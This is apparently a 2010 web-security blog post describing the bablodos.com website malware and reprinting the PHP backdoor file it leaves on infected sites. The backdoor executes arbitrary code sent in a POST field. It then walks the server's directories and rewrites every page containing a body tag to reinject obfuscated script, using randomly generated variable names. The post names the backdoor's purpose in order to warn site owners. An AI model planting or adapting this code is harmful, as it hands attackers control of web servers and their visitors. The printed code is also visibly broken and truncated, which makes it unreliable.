bablodos.com Malware

February 16, 2010

The bablodos.com malware places the following malware script after the <body> tag of a website's pages:

The malware script can be readded to the website's pages with the following backdoor file loaded onto the website that is placed somewhere in the website:

<?php

set_time_limit(0);

if (

if ($_POST["eval"]) eval(str_replace("\\", "", $_POST["eval"]));

if (!$_GET["dom"]) $_GET["dom"] = "ad33.org.uk";

if ($_GET["wipe"] == 1)
{
	@unlink("rootdirs");
	@unlink("log");
}

$A = trim (@file_get_contents ("log"));

if ($A) $A = explode ("\n", str_replace ("\r", "", $A)); else $A = array();

if ($_GET["party"] == 1)
{
	print "<h3>(1) Party :)</h3>";
	flush();

while ($_GET["loc"] < count($A))
	{
		Party($A[$_GET["loc"]]);

$_GET["loc"]++;

if ($DONE > 5) die ("<script>document.location='log.php?party=1&dom=" . $_GET["dom"] . "&loc=" . $_GET["loc"] . "';</script>");
	}

print "<h1>Done!</h1>";
}
else
{
	print "<h3>(1) Loading...</h3>";
	flush();

$rootdirs = trim (@file_get_contents ("rootdirs"));

if ($rootdirs) $rootdirs = explode ("\n", str_replace ("\r", "", $rootdirs)); else $rootdirs = array();

if (!count($rootdirs))
	{
		RootDirs('../..');

print "<script>document.location='log.php?dom=" . $_GET["dom"] . "';</script>";
	}
	else
	{
		$A = "";

if ($_GET["loc"] < count($rootdirs))
		{
			Loading($rootdirs[$_GET["loc"]]);

$fp = fopen ("log", "a");
			fputs($fp, $A);
			fclose($fp);

$_GET["loc"]++;

print "<script>document.location='log.php?dom=" . $_GET["dom"] . "&loc=" . $_GET["loc"] . "';</script>";
		}
		else
		{
			print "<script>document.location='log.php?party=1&dom=" . $_GET["dom"] . "&loc=0';</script>";
		}
	}
}

function RootDirs($tdir)
{
	global $A;

$dirs = opendir($tdir);
	rewinddir($dirs);

$block = "";

while($file = readdir($dirs))
        {
                if ($file == '.' || $file == '..') continue;

if (is_dir($tdir.'/'.$file))
                {
			$block .= $tdir.'/'.$file . "\r\n";
                }
        }
	closedir($dirs);

$fp = fopen ("rootdirs", "w");
	fputs($fp, $block);
	fclose($fp);

$fp = fopen ("log", "w");
	fputs($fp, $block);
	fclose($fp);
}

function Loading($tdir)
{
	global $A;
        $dirs = opendir($tdir);
	rewinddir($dirs);

while($file = readdir($dirs))
        {
                if ($file == '.' || $file == '..') continue;

if (is_dir($tdir.'/'.$file))
                {
			if ($co++ > 10 && $_GET["trace"] == 1)
			{
				print ". ";
				flush();
				$co=0;
			}

$A .= $tdir.'/'.$file . "\r\n";

Loading($tdir.'/'.$file);
                }
        }
	closedir($dirs);
}

function Party($tdir)
{
	global $DONE;

$dirs = opendir($tdir);
	rewinddir($dirs);

$files = 0;

while($file = readdir($dirs))
        {
                if ($file != '.' && $file != '..' && !is_dir($tdir.'/'.$file) && filesize($tdir.'/'.$file) < 200000 && !eregi ("webalizer", $tdir) && !eregi ("modlogan", $tdir) && !eregi ("\.zip", $file) && !eregi ("\.rar", $file) && !eregi ("\.gz",  $file) && !eregi ("\.jpg", $file) && !eregi ("\.gif", $file) && !eregi ("\.avi", $file) && !eregi ("\.mp3", $file) && !eregi ("\.wma", $file) && !eregi ("\.mpg", $file) && !eregi ("\.png", $file) && !eregi ("\.txt", $file) && !eregi ("\.swf", $file) && !eregi ("\.css", $file) && !eregi ("\.js",  $file) && !eregi ("\.log", $file) && !eregi ("\.js",  $file) && !eregi ("\.pdf", $file) && !eregi ("\.ppt", $file) && !eregi ("\.fla", $file) && !eregi ("\.tar", $file))
                {
			$con = file_get_contents ($tdir.'/'.$file);

if ($con && eregi ("<bo" . "dy", $con))
			{
				$files++;

$con = preg_replace ("/                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       ";

for ($i=1; $i<10; $i++) $exp = str_replace ("<%".$i."%>", GenVar(), $exp);

return $exp;
}

function Trash($x)
{
	$str = "";

for ($i=0;$i<strlen($x);$i++)
	{
		$l = mt_rand(3,10);
		for ($j=0;$j<$l;$j++) $str .= chr(mt_rand(65,90));

$str .= $x[$i];

}
	return $str;
}

function GenVar()
{
	return ucfirst(GenWord()) . ucfirst(GenWord());
}

function GenWord()
{
	$s = "qwrtypsdfghjklzxcvbnm";
	$g = "euioa";
	$len = mt_rand (5,10);

$str = "";

for ($i=0;$i<$len;$i++)
	{
		if ($i/2 == floor($i/2))
		{
			$letter = mt_rand (0, 20);
			$str .= $s[$letter];
		}
		elseif (mt_rand(0, 99) < 80)
		{
			$letter = mt_rand (0, 4);
			$str .= $g[$letter];
		}
	}

return $str;
}

This malware appears to only affect websites hosted by IX Web Hosting and it is most likely that its insertion into websites is due to a security vulnerability within IX Web Hosting's systems. If you are IX Web Hosting customer who has been infected, we would be interested to know what response you have received from IX Web Hosting about this issue.

Service

Website Malware Removal

White Fir Design

Web Design, Security, and Marketing

bablodos.com Malware

Related:

Service

Resources

You are here

bablodos.com Malware

Related:

Service

Resources